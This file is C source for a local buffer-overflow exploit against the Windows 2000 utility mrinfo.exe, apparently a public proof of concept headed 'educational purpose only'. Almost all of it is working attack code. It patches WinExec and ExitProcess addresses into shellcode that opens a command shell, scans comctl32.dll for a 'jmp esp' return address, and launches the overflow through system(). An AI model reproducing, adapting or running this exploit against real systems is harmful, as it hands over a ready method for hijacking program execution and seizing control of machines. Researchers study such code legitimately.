/**********************************************************************/
/*  [*]  EDUCATIONAL PURPOSE ONLY DOESN'T GIVE ANY ADMIN RIGHTS  [*]  */
/**********************************************************************/
/** mrinfo.exe exploit for win2k only (winXP causes an exception     **/
/** when it jumps to the jmp esp offset [in comctl32.dll] why?).     **/
/**********************************************************************/
/******************** coded by Scurt && kralor ************************/
/*********************** comments by kralor ***************************/
/******************** http://www.coromputer.net ***********************/
/*********************** undernet #coromputer *************************/
/**********************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <conio.h>
#include <windows.h>

#define RET_DLL "comctl32.dll"
#define EXE     "mrinfo.exe"

/***********************************************************************/
/**** int hardcore(char *buffer, char *lib, char *function, int pos) ***/
/***********************************************************************/
/*           Function that puts the offset of a function from          */
/*            a dll into a buffer at the desired place.                */
/***********************************************************************/
/*                           by kralor                                 */
/***********************************************************************/

int hardcore(char *buffer,char *library,char *function, int pos)
{
	void *pfunc;
	HMODULE llib;

	llib=LoadLibrary(library);
if(!llib)
	return -1;

	pfunc=GetProcAddress(llib,function);
if(!pfunc)
	return -2;

	buffer[pos]=((char *)&pfunc) [0];
	buffer[pos+1]=((char *)&pfunc) [1];
	buffer[pos+2]=((char *)&pfunc) [2];
	buffer[pos+3]=((char *)&pfunc) [3];
	return 0;
}

/***********************************************************************/
/****                    char *scan_dll(char *lib)                   ***/
/***********************************************************************/
/*     Function that scans a dll looking for the famous 2 opcodes      */
/*            jmp esp (0xff && 0xe4) and returns the offset            */
/***********************************************************************/
/*                               by Scurt                              */
/***********************************************************************/

char *scan_dll(char *lib)
{
	char nret[10]={0};
	char *ret;
	HMODULE offset;
	BOOL end = FALSE;
	int i=0;
	int y;

	offset=LoadLibrary(lib);

if(!offset)
	return 0;

	ret=(char*)malloc(10);

	while(!end)
	{
		/* 0xff && 0xe4 == jmp esp  */
		/* 0xff && 0xd4 == call esp */
		if((( BYTE *)offset)[i] == 0xff && (( BYTE *)offset)[i+1] == 0xe4)
		{
			sprintf(ret,"%x",&(( BYTE *)offset)[i]);
			end= TRUE;
		}
		i++;
	}
		for(y=0;y<10;y++)
		{
			nret[y]=ret[y]-48;
			if(nret[y]>10){
				switch((nret[y]-33))
				{
					case 16:
					nret[y]=0x0a;
					break;
					case 17:
					nret[y]=0x0b;
					break;
					case 18:
					nret[y]=0x0c;
					break;
					case 19:
					nret[y]=0x0d;
					break;
					case 20:
					nret[y]=0x0e;
					break;
					case 21:
					nret[y]=0x0f;
					break;
				}
				
			}

				
		}
	memset(ret,0,sizeof(ret));
	ret[0]=nret[0]*0x10+nret[1];
	ret[1]=nret[2]*0x10+nret[3];
	ret[2]=nret[4]*0x10+nret[5];
	ret[3]=nret[6]*0x10+nret[7];
	return ret;
}

int main(void)
{
	char *ret;
	char buffer[128];		
	char* pbuffer;
	char* pshellcode;
	HMODULE mod;

/*
the shellcode in C looks like this:
	WinExec("cmd",SW_SHOW);
	ExitProcess(0x69);
huh..
*/

	char shellcode[]= /* only a simple shellcode to spawn a shell */
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\xEB\x14"                              /* jmp there                  ---       */
                                                        /*here:                     <---|-      */
		"\x58"                                  /* pop eax                      ||      */
		"\x6A\x05"                              /* push 0x05                    ||      */
		"\x50"                                  /* push eax ("cmd")             ||      */
		"\xB8\x69\x69\x69\x69"                  /* mov eax, 69696969h           ||      */
		"\xFF\xD0"                              /* call eax (WinExec)           ||      */
		"\x6A\x69"                              /* push 0x69                    ||      */
		"\xB8\x69\x69\x69\x69"                  /* mov eax, 69696969h           ||      */
		"\xFF\xD0"                              /* call eax (ExitProcess)       ||      */
                                                        /*there:                      <--|      */
		"\xE8\xEB\xFF\xFF\xFF"                  /* call here                  ----      */
		"\x63\x6D\x64";                         /* "cmd"                                */

	printf("[*] Getting WinExec && ExitProcess addresses ...");

	if(hardcore(shellcode,"kernel32.dll","WinExec", 24)) {
		printf("error: unable to find WinExec function ...\r\n");
		return -1;
	}
	
	if(hardcore(shellcode,"kernel32.dll","ExitProcess", 33)) {
		printf("error: unable to find ExitProcess function ...\r\n");
		return -1;
	}

	printf("Done\r\n");

	mod=LoadLibrary("kernel32.dll");
	printf("WinExec    : 0x%x\r\n",GetProcAddress(mod,"WinExec"));
	printf("ExitProcess: 0x%x\r\n",GetProcAddress(mod,"ExitProcess"));

	printf("[*] Searching 'jmp esp' opcodes in %s ...",RET_DLL);
	ret=scan_dll(RET_DLL);
	if(!ret) {
		printf("error: unable to find 'jmp esp' opcodes in %s\r\n",RET_DLL);
		return 1;
	}
	printf("Done\r\n");
	printf("jmp esp    : 0x%x%x%x%x\r\n",(unsigned char)ret[0],(unsigned char)ret[1],(unsigned char)ret[2],(unsigned char)ret[3]);

	pbuffer=&buffer[0];
	pshellcode=&shellcode[0];
	sprintf(pbuffer,"%s -i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%c%c%c%c%s",EXE,ret[3],ret[2],ret[1],ret[0],pshellcode);

	printf("[*] Executing shellcode through %s   ...",EXE);
	system(buffer);
	printf("Done\r\n");
	Sleep(1000);
	return 0;
}